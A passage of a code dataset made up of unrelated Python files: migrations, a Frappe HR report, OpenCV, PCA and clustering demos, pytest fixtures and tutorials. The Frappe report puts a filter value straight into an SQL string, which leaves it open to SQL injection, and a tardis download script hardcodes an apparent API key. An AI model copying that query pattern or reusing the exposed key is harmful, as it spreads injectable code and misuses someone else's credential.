op.drop_index(op.f(\"ix_metricsunit_path\"), table_name=\"metricsunit\")\n op.drop_table(\"metricsunit\")\n # ### end Alembic commands ###\n","repo_name":"CAREEMER/monitoring-test-task","sub_path":"src/migrations/versions/e46dc3f1cd7b_init.py","file_name":"e46dc3f1cd7b_init.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36282230955","text":"import frappe\nfrom frappe import _\n\ndef execute(filters=None):\n\tcolumns, data = get_columns(), get_data(filters)\n\treturn columns, data\ndef get_data(filters):\n\tvolunteer = filters.get('volunteer')\n\tdata = frappe.db.sql(f\"\"\"\n\n\t\tselect \n\t\temployee,\n\t\n\t\temployee_name ,\n\t\t\t\t\t\t\n\t\tdepartment,\n\t\tdesignation,\n\t\tcell_number,\n\t\n\t\t\n\t\tamount\n\n\t\tfrom `tabEmployee`\n\n\t\twhere volunteer = \"{volunteer}\"\n\t\n\t\n\t\"\"\" , as_dict = 1)\n\n\n\treturn data \ndef get_columns():\n\tcolumns = [\n\t\t{\n\t\t\t\"label\": _(\"ID\"),\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"fieldname\": \"employee\",\n\t\t\t\n\t\t\t\"width\": 100,\n\t\t},\n\t\n\t\t{\n\t\t\t\"label\": _(\"Name\"),\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"fieldname\": \"employee_name\",\n\t\t\t\n\t\t\t\"width\": 250,\n\t\t},\n\t\t\n\t\t\n\t\t# {\n\t\t# \t\"label\": _(\"Department\"),\n\t\t# \t\"fieldtype\": \"Data\",\n\t\t# \t\"fieldname\": \"department\",\n\t\t\t\n\t\t# \t\"width\": 200,\n\t\t# },\n\n\t\t{\n\t\t\t\"label\": _(\"Designation\"),\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"fieldname\": \"designation\",\n\t\t\t\n\t\t\t\"width\": 200,\n\t\t},\n\n\t\t{\n\t\t\t\"label\": _(\"Mobile\"),\n\t\t\t\"fieldtype\": \"Data\",\n\t\t\t\"fieldname\": \"cell_number\",\n\t\t\t\n\t\t\t\"width\": 100,\n\t\t},\n\n\t\n\n\n\t\n\n\t\t{\n\t\t\t\"label\": _(\"Salary\"),\n\t\t\t\"fieldtype\": \"Currency\",\n\t\t\t\"fieldname\": \"amount\",\n\t\t\t\n\t\t\t\"width\": 100,\n\t\t},\n\n\n\t\n\t\n\t]\n\treturn columns\n","repo_name":"xakiin66/rasiin_hr","sub_path":"rasiin_hr/rasiin_hr/report/employee_list/employee_list.py","file_name":"employee_list.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42668169900","text":"import cv2\nimport numpy as np\n\n# Ler as duas imagens :\nimg1 = cv2.imread('solo.jpg', cv2.IMREAD_GRAYSCALE)\nimg2 = cv2.imread('analysis.jpg', cv2.IMREAD_GRAYSCALE)\n\n# Orb:\norb = cv2.ORB_create()\nkp1, desc1 = orb.detectAndCompute(img1, None)\nkp2, desc2 = orb.detectAndCompute(img2, None)\n\n# Matches:\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\nmatches = bf.match(desc1, desc2)\nmatches = sorted(matches, key = lambda x:x.distance)\n\n\n# Desenhar pontos correspondentes:\nmatching_result = cv2.drawMatches(img1, kp1, img2, kp2, matches[:50], None, flags=2)\n\n#for m in matches:\n # print(m.distance)\n\n # print(len(matches))\n \n#for d in desc1:\n#print(d)\n\n# Exibir imagens tratadas:\ncv2.imwrite('img1.jpg', img1)\ncv2.imwrite('img2.jpg', img2)\ncv2.imwrite('mat_res.jpg', matching_result)","repo_name":"caduleite/computacao-grafica","sub_path":"Reconhecimento imagens.py","file_name":"Reconhecimento imagens.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"15634963875","text":"weather_c = {\n \"Monday\": 12,\n \"Tuesday\": 14,\n \"Wednesday\": 15,\n \"Thursday\": 14,\n \"Friday\": 21,\n \"Saturday\": 22,\n \"Sunday\": 24,\n}\n# 🚨 Don't change code above 👆\n# for my in weather_c:\n# print(my,weather_c[my])\n# Write your code 👇 below:\nweather_f = {my: weather_c[my] * 9 / 5 + 32 for my in weather_c}\n\nprint(weather_f)\n","repo_name":"Victorchiemeka/100-Days-Of-Python","sub_path":"Day26-list-comprehension/excirise.py","file_name":"excirise.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38940629014","text":"import yfinance as yf, pandas as pd, shutil, os, time, glob\n#----------------------------------------------------RSI CALCULATION----------------------------------------------\n# Get the path for each stock file in a list\nlist_files = (glob.glob(\"B:\\Sheru\\coding\\python\\python-rsi-master\\src\\RSI\\data\\\\*RSI*\"))\n# You can use this line to limit the analysis to a portion of the stocks in the \"stocks folder\"\n# list_files = list_files[:1]\n# Create the dataframe that we will be adding the final analysis of each stock to\nCompare_Stocks = pd.DataFrame(columns=[\"Company\", \"RSI_DAILY\", \"RSI_WEEKLY\", \"RSI_Monthly\",\"RSI-Strength W-M\",\"RSI-Strength D-W\",\"RSI Diff W-M\",\"RSI Diff D-W\"])\n# While loop to cycle through the stock paths\nfor stock in list_files:\n # Dataframe to hold the historical data of the stock we are interested in.\n Hist_data = pd.read_csv(stock)\n Company = ((os.path.basename(stock)).split(\".NS_RSI.csv\")[0]) # Name of the company\n try:\n Hist_data_W = pd.read_csv('B:\\Sheru\\coding\\python\\python-rsi-master\\src\\RSI\\data_W\\\\'+Company+ '.NS_RSI.csv')\n Hist_data_M = pd.read_csv('B:\\Sheru\\coding\\python\\python-rsi-master\\src\\RSI\\data_M\\\\'+Company+ '.NS_RSI.csv')\n except FileNotFoundError:\n print('File not found '+Company) \n last_line = Hist_data.iloc[len(Hist_data)-1,6]\n last_line_W = Hist_data_W.iloc[len(Hist_data_W)-1,6]\n last_line_M = Hist_data_M.iloc[len(Hist_data_M)-1,6]\n add_row = {'Company' : Company,'RSI_DAILY' : last_line, 'RSI_WEEKLY' : last_line_W, 'RSI_Monthly' : last_line_M ,\"RSI-Strength W-M\" : (last_line_W-last_line_M)+last_line_W,\"RSI-Strength D-W\" :(last_line-last_line_W)+last_line,\"RSI Diff W-M\" : (last_line_W-last_line_M) ,\"RSI Diff D-W\":(last_line-last_line_W)}\n Compare_Stocks = Compare_Stocks.append(add_row, ignore_index = True) # Add the analysis on the stock to the existing Compare_Stocks dataframe\nCompare_Stocks.to_csv(\"B:\\Sheru\\coding\\python\\python-rsi-master\\src\\RSI\\RSI_GET_ALL_TEST.csv\", index = False) # Save the compiled data on each stock to a csv \n","repo_name":"sanjayrgaikwad/python","sub_path":"src/RSI/RSI_Calc_For_Each_Stock_W_M.py","file_name":"RSI_Calc_For_Each_Stock_W_M.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4815116858","text":"#1 ask user for pet name, store it in a variable\npet_name = input('enter your pet name:')\n#2 use fn to get pet name length, store length in a new variable\npet_name_length = len(pet_name)\n#3 validate - if-elif to print error messages if len is outside boundaries\nif(pet_name_length == 0):\n print(\"you must enter something\")\nelif(pet_name_length <2):\n print(\"Your pet must have a name with more than 2 letters\")\nelif(pet_name_length >= 20):\n print(\"Enter a name that is less than or equal to 20 letters\")\n\n","repo_name":"natasha960506/Computer_science","sub_path":"validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28314329901","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\n\nfor tc in range(1, T+1):\n # N : 화덕의 크기 N 개의 피자를 동시에 구울 수 있음\n # M : 구워야 하는 피자의 수\n N, M = map(int, input().split())\n cheese = list(map(int, input().split()))\n\n # 반복문 안에서 일단 N 이 허용하는 만큼의 피자를 넣을 것이다\n # 각각의 피자는 치즈의양이 다르고 한바퀴씩 돌때 2분의 1로 줄어들며 정수값만 남긴다\n # 치즈가 다 녹은 피자는 꺼내고 아직 넣지 않은 피자를 넣는다\n # 이런 방식으로 피자를 구웠을때, 가장 마지막까지 남아있는 피자 번호를 알아내자\n # 피자에 번호를 매겨야한다? enumerate()을 활용해야하나 고민\n \n","repo_name":"junhyukM/algo","sub_path":"swea/queue/5099_피자굽기/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43469881549","text":"from tardis_dev import datasets\n\ndef download(start_time, end_date):\n datasets.download(\n exchange=\"bybit\",\n data_types=[\n \"quotes\",\n \"liquidations\",\n \"derivative_ticker\",\n \"trades\"\n ],\n from_date=start_time,\n to_date=end_date,\n symbols=[\"BTCUSD\"],\n api_key=\"TD.9wkdm9sOpHKRn5zV.YN9Bl-Hd8Q9DfO7.g0zG3MmyiXpVEb9.U9iW0oOPu0HTaSa.gbTdYT7GV8tTc7B.NSzm\")\n\n#Example Download\ndownload(\"2022-01-02\", \"2022-04-01\") \n\n","repo_name":"Ruch-droid/crypto","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"41720905415","text":"from turtle import Turtle\r\n\r\n\r\nclass Brick(Turtle):\r\n def __init__(self, xcord, ycord, color):\r\n super().__init__()\r\n self.speed(\"fastest\")\r\n self.shape(\"square\")\r\n self.shapesize(.6, 2)\r\n self.color(color)\r\n self.penup()\r\n self.goto(xcord, ycord)","repo_name":"Jared-Glenn/100-Days-of-Python","sub_path":"Days 76-100/086_breakout_game/brick.py","file_name":"brick.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21167365931","text":"import pytest\nimport py.path\nimport tempfile\nfrom ce import get_app\nfrom datetime import datetime\nfrom pkg_resources import resource_filename\nfrom dateutil.relativedelta import relativedelta\n\nfrom modelmeta.v2 import (\n metadata,\n Ensemble,\n Emission,\n Model,\n Run,\n VariableAlias,\n Grid,\n Time,\n TimeSet,\n ClimatologicalTime,\n DataFile,\n DataFileVariableGridded,\n)\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom .mock_data import geoserver_data, tasmin_data, tasmax_data\n\n\n@pytest.fixture\ndef mock_thredds_url_root(monkeypatch):\n monkeypatch.setenv(\n \"THREDDS_URL_ROOT\",\n \"https://docker-dev03.pcic.uvic.ca/twitcher/ows/proxy/thredds/dodsC/datasets\",\n )\n\n\n@pytest.fixture(scope=\"function\")\ndef ce_response():\n return {\n \"test_period_20100101-20391230\": {\"mean\": 1, \"min\": 0, \"max\": 2},\n \"test_period_20400101-20691231\": {\"mean\": 3, \"min\": 1, \"max\": 5},\n \"test_period_20700101-20991231\": {\"mean\": 5, \"min\": 0, \"max\": 10},\n }\n\n\n@pytest.fixture(scope=\"function\")\ndef sessiondir(request,):\n dir = py.path.local(tempfile.mkdtemp())\n request.addfinalizer(lambda: dir.remove(rec=1))\n return dir\n\n\n@pytest.fixture(scope=\"function\")\ndef dsn(sessiondir,):\n return \"sqlite:///{}\".format(sessiondir.join(\"test.sqlite\").realpath())\n\n\n@pytest.fixture\ndef app(dsn,):\n app = get_app()\n app.config[\"TESTING\"] = True\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = dsn\n app.config[\"SQLALCHEMY_ECHO\"] = False\n return app\n\n\n@pytest.fixture\ndef cleandb(app,):\n db = SQLAlchemy(app)\n metadata.create_all(bind=db.engine)\n db.create_all()\n return db\n\n\n@pytest.fixture\ndef populateddb(cleandb,):\n\n now = datetime.utcnow()\n\n populateable_db = cleandb\n sesh = populateable_db.session\n\n # Ensembles\n\n p2a_rules = Ensemble(name=\"p2a_rules\", version=1.0, changes=\"\", description=\"\")\n ensembles = [\n p2a_rules,\n ]\n\n # Emissions\n historical = Emission(short_name=\"historical\")\n historical_rcp85 = Emission(short_name=\"historical,rcp85\")\n\n # Runs\n run1 = Run(name=\"r1i1p1\", emission=historical)\n run2 = Run(name=\"r1i1p1\", emission=historical_rcp85)\n\n # Models\n\n bnu = Model(short_name=\"BNU-ESM\", type=\"GCM\", runs=[run1], organization=\"BNU\")\n anusplin = Model(short_name=\"anusplin\", type=\"GCM\", runs=[run1], organization=\"\")\n canesm2 = Model(short_name=\"CanESM2\", type=\"GCM\", runs=[run2], organization=\"\")\n models = [bnu, anusplin, canesm2]\n\n # Data files\n\n def make_data_file(\n filename=None, run=None,\n ):\n if not filename.startswith(\"/\"):\n filename = resource_filename(\"ce\", \"tests/data/{}\".format(filename))\n return DataFile(\n filename=filename,\n unique_id=filename,\n first_1mib_md5sum=\"xxxx\",\n x_dim_name=\"lon\",\n y_dim_name=\"lat\",\n index_time=now,\n run=run,\n )\n\n df_bnu_seasonal = make_data_file(\n filename=\"tasmin_sClim_BNU-ESM_historical_r1i1p1_19650101-19701230.nc\",\n run=run1,\n ) # Only local file (only used to test file collector). All other files from THREDDS.\n\n storage_root_anusplin = (\n \"/storage/data/climate/downscale/BCCAQ2/ANUSPLIN/climatologies/\"\n )\n storage_root_canesm2 = \"/storage/data/projects/comp_support/climate_explorer_data_prep/climatological_means/downscale/output/\"\n canesm2_tasmin_root = storage_root_canesm2 + \"2433/\"\n canesm2_tasmax_root = storage_root_canesm2 + \"2495/\"\n\n df_anusplin_tasmin_seasonal = make_data_file(\n filename=storage_root_anusplin\n + \"tasmin_sClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_anusplin_tasmax_seasonal = make_data_file(\n filename=storage_root_anusplin\n + \"tasmax_sClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_anusplin_tasmin_mon = make_data_file(\n filename=storage_root_anusplin\n + \"tasmin_mClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_anusplin_tasmax_mon = make_data_file(\n filename=storage_root_anusplin\n + \"tasmax_mClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_anusplin_pr_seasonal = make_data_file(\n filename=storage_root_anusplin\n + \"pr_sClimMean_anusplin_historical_19710101-20001231.nc\",\n run=run1,\n )\n df_canesm2_tasmin_2050_seasonal = make_data_file(\n filename=canesm2_tasmin_root\n + \"tasmin_sClim_BCCAQv2_CanESM2_historical+rcp85_r1i1p1_20400101-20691231_Canada.nc\",\n run=run2,\n )\n df_canesm2_tasmax_2050_seasonal = make_data_file(\n filename=canesm2_tasmax_root\n + \"tasmax_sClim_BCCAQv2_CanESM2_historical+rcp85_r1i1p1_20400101-20691231_Canada.nc\",\n run=run2,\n )\n df_canesm2_tasmin_2080_seasonal = make_data_file(\n filename=canesm2_tasmin_root\n + \"tasmin_sClim_BCCAQv2_CanESM2_historical+rcp85_r1i1p1_20700101-20991231_Canada.nc\",\n run=run2,\n )\n df_canesm2_tasmax_2080_seasonal = make_data_file(\n filename=canesm2_tasmax_root\n + \"tasmax_sClim_BCCAQv2_CanESM2_historical+rcp85_r1i1p1_20700101-20991231_Canada.nc\",\n run=run2,\n )\n data_files = [v for k, v in locals().items() if k.startswith(\"df\")]\n\n # VariableAlias\n\n tasmin = VariableAlias(\n long_name=\"Daily Minimum Temperature\",\n standard_name=\"air_temperature\",\n units=\"degC\",\n )\n tasmax = VariableAlias(\n long_name=\"Daily Maximum Temperature\",\n standard_name=\"air_temperature\",\n units=\"degC\",\n )\n pr = VariableAlias(\n long_name=\"Precipitation\",\n standard_name=\"precipitation_flux\",\n units=\"kg d-1 m-2\",\n )\n flow_direction = VariableAlias(\n long_name=\"Flow Direction\", standard_name=\"flow_direction\", units=\"1\",\n )\n variable_aliases = [\n tasmin,\n tasmax,\n pr,\n flow_direction,\n ]\n\n # Grids\n\n grid_anuspline = Grid(\n name=\"Canada ANUSPLINE\",\n xc_grid_step=0.0833333,\n yc_grid_step=0.0833333,\n xc_origin=-140.958,\n yc_origin=41.0417,\n xc_count=1068,\n yc_count=510,\n xc_units=\"degrees_east\",\n yc_units=\"degrees_north\",\n evenly_spaced_y=True,\n )\n grids = [grid_anuspline]\n\n # Add all the above\n\n sesh.add_all(ensembles)\n sesh.add_all(models)\n sesh.add_all(data_files)\n sesh.add_all(variable_aliases)\n sesh.add_all(grids)\n sesh.flush()\n\n # DataFileVariable\n\n def make_data_file_variable(\n file, cell_methods, var_name=None, grid=grid_anuspline,\n ):\n var_name_to_alias = {\n \"tasmin\": tasmin,\n \"tasmax\": tasmax,\n \"pr\": pr,\n \"flow_direction\": flow_direction,\n }[var_name]\n return DataFileVariableGridded(\n file=file,\n netcdf_variable_name=var_name,\n range_min=0,\n range_max=50,\n variable_alias=var_name_to_alias,\n grid=grid,\n variable_cell_methods=cell_methods,\n )\n\n tmax_bnu = make_data_file_variable(\n df_bnu_seasonal, cell_methods=\"time: maximum\", var_name=\"tasmin\",\n )\n tmin_anusplin_seasonal = make_data_file_variable(\n df_anusplin_tasmin_seasonal,\n cell_methods=\"time: minimum time: mean over days\",\n var_name=\"tasmin\",\n )\n tmax_anusplin_seasonal = make_data_file_variable(\n df_anusplin_tasmax_seasonal,\n cell_methods=\"time: maximum time: mean over days\",\n var_name=\"tasmax\",\n )\n tmin_anusplin_mon = make_data_file_variable(\n df_anusplin_tasmin_mon,\n cell_methods=\"time: minimum time: mean over days\",\n var_name=\"tasmin\",\n )\n tmax_anusplin_mon = make_data_file_variable(\n df_anusplin_tasmax_mon,\n cell_methods=\"time: minimum time: mean over days\",\n var_name=\"tasmax\",\n )\n pr_anusplin = make_data_file_variable(\n df_anusplin_pr_seasonal,\n cell_methods=\"time: mean time: mean over days\",\n var_name=\"pr\",\n )\n tmin_canesm2_2050 = make_data_file_variable(\n df_canesm2_tasmin_2050_seasonal,\n cell_methods=\"time: minimum\",\n var_name=\"tasmin\",\n )\n tmax_canesm2_2050 = make_data_file_variable(\n df_canesm2_tasmax_2050_seasonal,\n cell_methods=\"time: maximum\",\n var_name=\"tasmax\",\n )\n tmin_canesm2_2080 = make_data_file_variable(\n df_canesm2_tasmin_2080_seasonal,\n cell_methods=\"time: minimum\",\n var_name=\"tasmin\",\n )\n tmax_canesm2_2080 = make_data_file_variable(\n df_canesm2_tasmax_2080_seasonal,\n cell_methods=\"time: maximum\",\n var_name=\"tasmax\",\n )\n var_names = (\"tmin\", \"tmax\")\n data_file_variables = [\n v for k, v in locals().items() if k.startswith(var_names)\n ] + [pr_anusplin]\n\n sesh.add_all(data_file_variables)\n sesh.flush()\n\n # Associate to Ensembles\n\n for dfv in data_file_variables:\n p2a_rules.data_file_variables.append(dfv)\n sesh.add_all(sesh.dirty)\n\n # TimeSets\n\n ts_hist_seasonal = TimeSet(\n calendar=\"standard\",\n start_date=datetime(1971, 1, 1),\n end_date=datetime(2000, 12, 31),\n multi_year_mean=True,\n num_times=4,\n time_resolution=\"seasonal\",\n times=[\n Time(time_idx=i, timestep=datetime(1986, 3 * i + 1, 16)) for i in range(4)\n ],\n climatological_times=[\n ClimatologicalTime(\n time_idx=i,\n time_start=datetime(1971, 3 * i + 1, 1) - relativedelta(months=1),\n time_end=datetime(2000, 3 * i + 1, 1) + relativedelta(months=2),\n )\n for i in range(4)\n ],\n )\n ts_hist_mon = TimeSet(\n calendar=\"standard\",\n start_date=datetime(1971, 1, 1),\n end_date=datetime(2000, 12, 31),\n multi_year_mean=True,\n num_times=12,\n time_resolution=\"monthly\",\n times=[Time(time_idx=i, timestep=datetime(1986, i + 1, 15)) for i in range(12)],\n climatological_times=[\n ClimatologicalTime(\n time_idx=i,\n time_start=datetime(1971, i + 1, 1),\n time_end=datetime(2000, i + 1, 1) + relativedelta(months=1),\n )\n for i in range(12)\n ],\n )\n ts_2050_seasonal = TimeSet(\n calendar=\"standard\",\n start_date=datetime(2040, 1, 1),\n end_date=datetime(2069, 12, 31),\n multi_year_mean=True,\n num_times=4,\n time_resolution=\"seasonal\",\n times=[\n Time(\n time_idx=i,\n timestep=datetime(2054, 11, 27) + relativedelta(months=3 * i),\n )\n for i in range(4)\n ],\n climatological_times=[\n ClimatologicalTime(\n time_idx=i,\n time_start=datetime(2040, 3 * i + 1, 16) - relativedelta(months=1),\n time_end=datetime(2069, 3 * i + 1, 6),\n )\n for i in range(4)\n ],\n )\n ts_2080_seasonal = TimeSet(\n calendar=\"standard\",\n start_date=datetime(2070, 1, 1),\n end_date=datetime(2099, 12, 31),\n multi_year_mean=True,\n num_times=4,\n time_resolution=\"seasonal\",\n times=[\n Time(\n time_idx=i,\n timestep=datetime(2084, 11, 19) + relativedelta(months=3 * i),\n )\n for i in range(4)\n ],\n climatological_times=[\n ClimatologicalTime(\n time_idx=i,\n time_start=datetime(2070, 3 * i + 1, 8) - relativedelta(months=3),\n time_end=datetime(2099, 3 * i + 1, 1),\n )\n for i in range(4)\n ],\n )\n ts_hist_seasonal.files = [\n df_bnu_seasonal,\n df_anusplin_tasmin_seasonal,\n df_anusplin_tasmax_seasonal,\n df_anusplin_pr_seasonal,\n ]\n ts_hist_mon.files = [df_anusplin_tasmin_mon, df_anusplin_tasmax_mon]\n ts_2050_seasonal.files = [\n df_canesm2_tasmin_2050_seasonal,\n df_canesm2_tasmax_2050_seasonal,\n ]\n ts_2080_seasonal.files = [\n df_canesm2_tasmin_2080_seasonal,\n df_canesm2_tasmax_2080_seasonal,\n ]\n sesh.add_all(sesh.dirty)\n\n sesh.commit()\n return populateable_db\n\n\n@pytest.fixture()\ndef mock_urls(requests_mock):\n requests_mock.register_uri(\n \"GET\",\n \"http://docker-dev01.pcic.uvic.ca:30123/geoserver/bc_regions/ows\",\n content=geoserver_data,\n )\n requests_mock.register_uri(\n \"GET\",\n \"https://docker-dev03.pcic.uvic.ca/twitcher/ows/proxy/thredds/fileServer/datasets\"\n \"/storage/data/climate/downscale/BCCAQ2/ANUSPLIN/climatologies/\"\n \"tasmin_sClimMean_anusplin_historical_19710101-20001231.nc\",\n content=tasmin_data,\n )\n requests_mock.register_uri(\n \"GET\",\n \"https://docker-dev03.pcic.uvic.ca/twitcher/ows/proxy/thredds/fileServer/datasets\"\n \"/storage/data/climate/downscale/BCCAQ2/ANUSPLIN/climatologies/\"\n \"tasmax_sClimMean_anusplin_historical_19710101-20001231.nc\",\n content=tasmax_data,\n )\n","repo_name":"pacificclimate/p2a-rule-engine","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":13230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72610873032","text":"# 2/26/2023\n# ---SoloLearn---\n\"\"\"\nWriting Files\n\nTo write to files you use the write method.\nThis will create a new file called \"newfile.txt\" and write the content to it.\n\nIn case the file already exists, its entire content will be replaced when you open it in write mode using \"w\".\n\"\"\"\n\nfile = open(\"newfile.txt\", \"w\")\nfile.write(\"This has been written to a file\")\nfile.close()\n\n'''\nIf you want to add content to an existing file, you can open it using the \"a\" mode, which stand for \n\"append\": \n'''\nfile = open(\"newfile.txt\", \"a\")\n\nfile.write(\"\\nThe Da Vinci Code\")\nfile.close()\n\n'''\nThe write method returns the number of bytes written to a file, if successful.\n'''\nmsg = \"Hello world!\"\nfile = open(\"newfile.txt\", \"w\")\namount_written = file.write(msg)\nprint(amount_written)\nfile.close()\n\n'''\nTake a number N as input and write the numbers 1 to N to the file \"numbers.txt\", each number on a \nseparate line.\n'''\nn = int(input())\n\nfile = open(\"numbers.txt\", \"w+\")\nfor i in range(1, n+1):\n file.write(str(i))\n file.write(\"\\n\")\n\nfile.close()\n\nf = open(\"numbers.txt\", \"r\")\nprint(f.read())\nf.close()","repo_name":"blazenkd/Training","sub_path":"Fundamentals/Python/Files/writing_files.py","file_name":"writing_files.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72537799431","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 7 18:07:06 2019\n\n@author: kaany\n\"\"\"\nfrom sklearn.decomposition import PCA\nfrom sklearn.model_selection import train_test_split\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nfrom DataGenerator import generateData\nfrom Preprocessing import transfromFeaturesToNoiseRandomly\n\nfrom settings import (NUMBER_OF_CLASSES, NUMBER_OF_FEATURES,\n NUMBER_OF_RECORDS_PER_CLASS,\n FEATURE_MEAN_RANGE, RANDOM_NUMBER_SEED,\n NUMBER_OF_FEATURES_TO_PRUNE, TEST_SIZE_PERCENTAGE,\n NOISE_MEAN, NOISE_STD)\n\nOPACITY = 0.7\n\nnp.random.seed(RANDOM_NUMBER_SEED)\n\ndata, labels = generateData(NUMBER_OF_CLASSES, NUMBER_OF_FEATURES,\n NUMBER_OF_RECORDS_PER_CLASS, FEATURE_MEAN_RANGE,\n RANDOM_NUMBER_SEED)\nprunedtrainData = transfromFeaturesToNoiseRandomly(data, labels,\n NUMBER_OF_FEATURES_TO_PRUNE,\n NOISE_MEAN, NOISE_STD,\n randomNumberSeed=RANDOM_NUMBER_SEED)\n\nX_train, X_test, y_train, y_test = train_test_split(prunedtrainData, labels,\n test_size=TEST_SIZE_PERCENTAGE)\n\ndistincttrainLabels = np.unique(labels)\n\n# PLOT\n\nplt.figure()\nplt.title(\"Data Set\")\nplt.xlabel(\"Feature 1\")\nplt.ylabel(\"Feature 2\")\nfor i, label in enumerate(distincttrainLabels):\n plt.scatter(X_train[y_train==label,0], X_train[y_train==label,1],\n c=np.random.rand(3,), alpha=OPACITY,\n label=\"Class {}\".format(i))\n\nplt.legend()\n\npca = PCA()\npcaTrainData = pca.fit_transform(X_train)\n\nplt.figure()\nplt.title(\"Feature Selection With PCA\")\nplt.xlabel(\"PC1\")\nplt.ylabel(\"PC2\")\nfor i, label in enumerate(distincttrainLabels):\n plt.scatter(pcaTrainData[y_train==label,0], pcaTrainData[y_train==label,1],\n c=np.random.rand(3,), alpha=OPACITY,\n label=\"Class {}\".format(i))\n\nplt.legend()\n","repo_name":"edforsberg/MMV440_project3","sub_path":"PCA-Main.py","file_name":"PCA-Main.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"9757972844","text":"# 亲和力传播聚类\nfrom numpy import unique\nfrom numpy import where\nfrom sklearn.datasets import make_classification\nfrom sklearn.cluster import AffinityPropagation\nfrom matplotlib import pyplot\n\n# 生成数据集\n\"\"\"\nmake_classification函数\nsklearn.datasets.make_classification(n_samples=100, n_features=20, *, n_informative=2, n_redundant=2, n_repeated=0, n_classes=2, n_clusters_per_class=2, weights=None, flip_y=0.01, class_sep=1.0, hypercube=True, shift=0.0, scale=1.0, shuffle=True, random_state=None)\n\n参数\t类型\t默认值\t含义\nn_samples\tint\t100\t样本数量\nn_features\tint\t20\t特征总数。这些包括n_informative 信息特征、n_redundant冗余特征、 n_repeated重复特征和 n_features-n_informative-n_redundant-n_repeated随机抽取的无用特征。\nn_informative\tint\t2\t信息特征的数量。\nn_redundant\tint\t2\t冗余特征的数量。这些特征是作为信息特征的随机线性组合生成的。(假设n_informative=F1,F2,…那么n_redundant= aF1+bF2+… a,b,c就是随机数)\nn_repeated\tint\t0\t从信息特征和冗余特征中随机抽取的重复特征的数量。\nn_classes\tint\t2\t分类问题的类(或标签)数。\nn_clusters_per_class\tint\t2\t每个类的集群数。\nrandom_state\tint\tNone\t类似随机种子,复现随机数\n\"\"\"\nX, _ = make_classification(n_samples=1000, n_features=2, n_informative=2, n_redundant=0, n_clusters_per_class=1,\n random_state=4)\n\n# 定义模型.Affinity Propagation聚类算法简称AP.\n# 2007年Brendan J Frey和Delbert Dueck发表于Science期刊。\n# AP算法思想是,网络中所有样本点作为节点,通过节点间传递归属度和吸引度两类信息来计算聚类中心,\n# 迭代计算出最优的数个聚类中心,并将剩余节点划分到相应的类中。\n\n'''\nAffinityPropagation(damping=0.5, max_iter=200, convergence_iter=15, copy=True, preference=None, affinity=’euclidean’, verbose=False)\n\n函数参数\n\n damping : float, optional, default: 0.5,阻尼系数,默认值0.5\n\n max_iter : int, optional, default: 200,最大迭代次数,默认值是200\n\n convergence_iter : int, optional, default: 15,在停止收敛的估计集群数量上没有变化的迭代次数。默认15\n\n copy : boolean, optional, default: True,布尔值,可选,默认为true,即允许对输入数据的复制\n\n preference : array-like, shape (n_samples,) or float, optional,近似数组,每个点的偏好 - 具有较大偏好值的点更可能被选为聚类的中心点。 簇的数量,即集群的数量受输入偏好值的影响。 如果该项未作为参数,则选择输入相似度的中位数作为偏好\n\n affinity : string, optional, default=``euclidean``目前支持计算预欧几里得距离。 即点之间的负平方欧氏距离。\n\n verbose : boolean, optional, default: False\n'''\n\nmodel = AffinityPropagation(preference=-600, damping=0.7)\n# 匹配模型\nmodel.fit(X)\n\nprint(X)\n# 为每个示例分配一个集群\nyhat = model.predict(X)\n# 检索唯一群集\nclusters = unique(yhat)\n# 为每个群集的样本创建散点图\nfor cluster in clusters:\n # 获取此群集的示例的行索引\n row_ix = where(yhat == cluster)\n print(cluster)\n print(row_ix)\n\n # 创建这些样本的散布\n pyplot.scatter(X[row_ix, 0], X[row_ix, 1])\n # 